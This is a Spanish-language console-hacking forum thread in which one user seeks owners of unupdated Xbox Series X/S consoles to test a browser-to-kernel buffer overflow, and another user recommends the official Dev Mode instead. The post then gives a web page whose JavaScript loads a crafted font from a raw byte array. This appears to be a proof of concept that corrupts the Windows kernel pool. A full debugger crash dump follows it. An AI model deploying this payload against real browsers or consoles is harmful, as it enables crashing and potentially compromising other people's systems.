fjrish escribió:cmhacks escribió:Buenas.
Si alguien tiene una xbox series x/s, no la ha actualizado y quiere cacharrear, le agradecería que me dejara probar un par de cosas.
Necesito corroborar un buferoverflow en el kernel space del guest que se encarga del navegador y así saltar al baremetal. A partir si confirmo dicho bug, dejaría a otros que buscaran un vector desde el baremetal > firmware. ( no tengo mucho tiempo )
Ya decís que tal!
Saludos.
Parece que no has pillado nunca una xbox one, supongo que es normal, si quieres tenerla pirata y que no te baneen debes pagar una parte a Microsoft eran 20 euros y para siempre, desde la store busca devmode de xbox para que tu consola se convierta en modo desarrollor y puedes poner lo que tu quieras emuladores, etc.. así de simple.
Eso si hoy en día nadie lo tiene en modo Desarrollor por el game pass ultímate.
Por si alguien le interesa en la store de xbox buscar devmode.
Lo bueno de esto es que no te banean la consola y puedes disfrutar de tus emuladores o lo que quieras ponerle a la consola.
Totalmente y oficialmente por Microsoft.
https://docs.microsoft.com/es-es/window ... activation
Más información en el modo Dev con algunos emuladores
https://www.3djuegos.com/comunidad-foro ... rrollador/
No os confundáis también sirve para xbox serie S/X![[oki]](/images/smilies/net_thumbsup.gif "Ok!")
En construcción...
fjrish escribió:@cmhacks
Déjate de tonterías lo del buferoverflow que comentas si o si necesitas el Dev Mode de Microsoft no puedes modificar nada si el consentimiento de ellos, además de otras cosas.
Por otro lado esto no deveria estar en general si no en otro apartado que ni siquiera está.
<body>
<script>
font_face = new FontFace('fontname', new Uint8Array([0,1,0,0,0,11,0,144,0,3,0,
32,79,83,47,50,0,0,0,0,0,0,0,188,0,0,0,96,99,109,97,112,0,0,0,0,0,0,1,28,0,
0,0,44,103,108,121,102,0,0,0,0,0,0,1,72,0,0,0,2,104,101,97,100,0,0,0,0,0,0,
1,76,0,0,0,54,104,104,101,97,0,0,0,0,0,0,1,132,0,0,0,36,104,109,116,120,0,0,
0,0,0,0,1,168,0,0,0,12,108,111,99,97,0,0,0,0,0,0,1,180,0,0,0,8,109,97,120,
112,0,0,0,0,0,0,1,188,0,0,0,32,110,97,109,101,0,0,0,0,0,0,1,220,0,0,0,6,112,
111,115,116,0,0,0,0,0,0,1,228,0,0,0,40,115,98,105,120,0,0,0,0,0,0,2,12,0,0,
1,157,0,4,3,31,1,144,0,5,0,0,2,188,2,138,0,0,0,140,2,188,2,138,0,0,1,221,0,
50,0,250,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,32,32,32,
32,0,64,0,65,0,67,2,238,255,6,0,0,3,32,0,18,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
32,0,8,0,0,0,1,0,3,0,1,0,0,0,12,0,4,0,32,0,0,0,4,0,4,0,1,0,0,0,67,255,255,0,
0,0,65,255,255,255,191,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,95,15,60,
245,0,43,3,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,32,3,32,0,0,0,8,0,2,
0,0,0,0,0,0,0,1,0,0,3,32,255,6,0,0,3,32,255,255,0,1,3,31,0,1,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,3,3,32,0,90,3,32,0,90,3,32,0,90,0,0,0,0,0,0,0,0,0,1,0,0,0,3,
0,8,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,6,0,0,0,2,0,0,
0,0,0,0,255,181,0,50,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,
0,0,1,0,1,0,0,0,1,0,0,0,12,0,150,0,72,0,0,0,20,0,0,0,20,0,0,0,208,0,0,1,145,
0,0,0,0,112,110,103,32,137,80,78,71,13,10,26,10,0,0,0,13,73,72,68,82,0,0,0,
3,0,1,0,163,8,6,0,0,1,244,153,148,89,0,0,0,121,73,68,65,84,120,1,1,110,0,
145,255,0,255,255,65,255,0,255,255,65,255,0,255,255,65,255,0,255,255,65,255,
0,255,255,65,255,0,255,255,65,255,0,255,255,65,255,0,255,255,65,255,0,255,
255,65,255,0,255,255,65,255,0,255,255,65,255,0,255,255,65,255,0,255,255,65,
255,0,255,255,65,255,0,255,255,65,255,0,255,255,65,255,0,255,255,65,255,0,
255,255,65,255,0,255,255,65,255,0,255,255,65,255,0,255,255,65,255,0,255,255,
65,255,92,133,71,85,172,91,212,33,0,0,0,0,73,69,78,68,174,66,96,130,241,139,
0,0,0,0,112,110,103,32,137,80,78,71,13,10,26,10,0,0,0,13,73,72,68,82,0,0,0,
3,0,1,0,163,8,6,0,0,1,244,153,148,89,0,0,0,126,73,68,65,84,120,1,1,115,0,
140,255,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,115,0,1,194,215,216,247,0,0,0,0,73,69,78,68,174,66,96,130,184,
140,0,0,0]));
font_face.load().then(() => {
document.fonts.add(font_face);
document.body.style.fontFamily = 'fontname';
document.body.textContent = 'B';
});
</script> </body>
SYSTEM_SERVICE_EXCEPTION (3b)
An exception happened while executing a system service routine.
Arguments:
Arg1: 00000000c0000005, Exception code that caused the bugcheck
Arg2: fffff805742ef680, Address of the instruction which caused the bugcheck
Arg3: ffffe481b8baf930, Address of the context record for the exception that caused the bugcheck
Arg4: 0000000000000000, zero.
CONTEXT: ffffe481b8baf930 -- (.cxr 0xffffe481b8baf930)
rax=0030003000200030 rbx=0000000002000000 rcx=0000000000000000
rdx=0000000000000000 rsi=0030003000200030 rdi=0000000000000001
rip=fffff805742ef680 rsp=ffffbe82059b1270 rbp=0000000000000000
r8=ffffc187ad1005a0 r9=ffffc187a5a02160 r10=0000000000000000
r11=ffffbe82059b1920 r12=0000000000000002 r13=ffffc187a5a02100
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00050206
nt!RtlpHpSegPageRangeAllocate+0x100:
fffff805`742ef680 3b5e1c cmp ebx,dword ptr [rsi+1Ch] ds:002b:00300030`0020004c=????????
Resetting default scope
PROCESS_NAME: ConsoleApplication1.exe
BAD_STACK_POINTER: ffffe481b8bae858
STACK_TEXT:
ffffbe82`059b1270 fffff805`742ef20f : 00000000`00000000 ffffc187`00000000 ffff8c5e`00000000 00000000`00000000 : nt!RtlpHpSegPageRangeAllocate+0x100
ffffbe82`059b1310 fffff805`74232d70 : 00000000`00002000 00000000`00002000 ffffc187`ae9b5080 ffff935f`d0217ac8 : nt!RtlpHpSegAlloc+0x6f
ffffbe82`059b13c0 fffff805`7456a06d : fffff805`74305ba0 ffffc187`a60e4080 ffffc187`66726550 00000000`00000080 : nt!ExAllocateHeapPool+0x920
ffffbe82`059b1500 fffff805`74833e8e : 00000000`00000001 ffffbe82`059b1650 00000000`00000000 ffffc187`00000000 : nt!ExAllocatePoolWithTag+0x5d
ffffbe82`059b1550 fffff805`74833389 : ffff9333`c6ba28a0 ffff935f`d0d17851 ffffc187`ade2b001 ffff8288`00000001 : nt!EtwpEnumerateAddressSpace+0xaa
ffffbe82`059b16c0 fffff805`74865f86 : ffffc187`ade2b080 ffffc187`ade2b080 00000000`00000001 00000000`00000001 : nt!EtwTraceProcess+0x1b1
ffffbe82`059b1950 fffff805`7485c2cf : ffffc187`ae9b5688 00000000`00000000 ffffbe82`059b1b80 00000000`00000000 : nt!PspExitProcess+0x4e
ffffbe82`059b1980 fffff805`74836bcb : 00000000`00000000 ffffbe82`059b1b01 000000db`4aa8b000 ffffc187`ae9b5080 : nt!PspExitThread+0x5c7
ffffbe82`059b1a90 fffff805`743ce118 : ffffc187`00001d50 ffffc187`ae9b5080 ffffc187`ade2b080 00000000`00000000 : nt!NtTerminateProcess+0xeb
ffffbe82`059b1b00 00007ffb`065dc5e4 : 00007ffb`065aa958 00000000`00000000 00000000`00000000 000002c2`99aa8a30 : nt!KiSystemServiceCopyEnd+0x28
000000db`4a90fbe8 00007ffb`065aa958 : 00000000`00000000 00000000`00000000 000002c2`99aa8a30 00000000`00000000 : ntdll!NtTerminateProcess+0x14
000000db`4a90fbf0 00007ffb`0584cd8a : 00000000`00000000 00000000`00000000 00007ffb`04419b70 000002c2`99aa8a30 : ntdll!RtlExitUserProcess+0xb8
000000db`4a90fc20 00007ffb`0437ba9c : 00000000`00000000 00000000`00000000 000000db`4a90fca8 00007ffb`0444bc20 : KERNEL32!ExitProcessImplementation+0xa
000000db`4a90fc50 00007ffb`0437b93f : 00000000`00000000 00000000`00000000 000002c2`99aa8a30 000000db`4a90fca0 : ucrtbase!exit_or_terminate_process+0x44
000000db`4a90fc80 00007ff7`3a5414db : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000001 : ucrtbase!common_exit+0x6f
000000db`4a90fcd0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000001 00000000`00000000 : ConsoleApplication1+0x14db
2: kd> k
# Child-SP RetAddr Call Site
00 ffffe481`b8bae858 fffff805`744a6642 nt!DbgBreakPointWithStatus
01 ffffe481`b8bae860 fffff805`744a5d32 nt!KiBugCheckDebugBreak+0x12
02 ffffe481`b8bae8c0 fffff805`743bca07 nt!KeBugCheck2+0x952
03 ffffe481`b8baefc0 fffff805`743ce6e9 nt!KeBugCheckEx+0x107
04 ffffe481`b8baf000 fffff805`743cdb3c nt!KiBugCheckDispatch+0x69
05 ffffe481`b8baf140 fffff805`743c5632 nt!KiSystemServiceHandler+0x7c
06 ffffe481`b8baf180 fffff805`742ca765 nt!RtlpExecuteHandlerForException+0x12
07 ffffe481`b8baf1b0 fffff805`742cecfe nt!RtlDispatchException+0x4a5
08 ffffe481`b8baf900 fffff805`743bd772 nt!KiDispatchException+0x16e
09 ffffe481`b8baffb0 fffff805`743bd740 nt!KxExceptionDispatchOnExceptionStack+0x12
0a ffffbe82`059b0ef8 fffff805`743ce816 nt!KiExceptionDispatchOnExceptionStackContinue
0b ffffbe82`059b0f00 fffff805`743ca5a2 nt!KiExceptionDispatch+0x116
0c ffffbe82`059b10e0 fffff805`742ef680 nt!KiGeneralProtectionFault+0x322
0d ffffbe82`059b1270 fffff805`742ef20f nt!RtlpHpSegPageRangeAllocate+0x100
0e ffffbe82`059b1310 fffff805`74232d70 nt!RtlpHpSegAlloc+0x6f
0f ffffbe82`059b13c0 fffff805`7456a06d nt!ExAllocateHeapPool+0x920
10 ffffbe82`059b1500 fffff805`74833e8e nt!ExAllocatePoolWithTag+0x5d
11 ffffbe82`059b1550 fffff805`74833389 nt!EtwpEnumerateAddressSpace+0xaa
12 ffffbe82`059b16c0 fffff805`74865f86 nt!EtwTraceProcess+0x1b1
13 ffffbe82`059b1950 fffff805`7485c2cf nt!PspExitProcess+0x4e
14 ffffbe82`059b1980 fffff805`74836bcb nt!PspExitThread+0x5c7
15 ffffbe82`059b1a90 fffff805`743ce118 nt!NtTerminateProcess+0xeb
16 ffffbe82`059b1b00 00007ffb`065dc5e4 nt!KiSystemServiceCopyEnd+0x28
17 000000db`4a90fbe8 00007ffb`065aa958 ntdll!NtTerminateProcess+0x14
18 000000db`4a90fbf0 00007ffb`0584cd8a ntdll!RtlExitUserProcess+0xb8
19 000000db`4a90fc20 00007ffb`0437ba9c KERNEL32!ExitProcessImplementation+0xa
1a 000000db`4a90fc50 00007ffb`0437b93f ucrtbase!exit_or_terminate_process+0x44
1b 000000db`4a90fc80 00007ff7`3a5414db ucrtbase!common_exit+0x6f
1c 000000db`4a90fcd0 00000000`00000000 ConsoleApplication1+0x14db
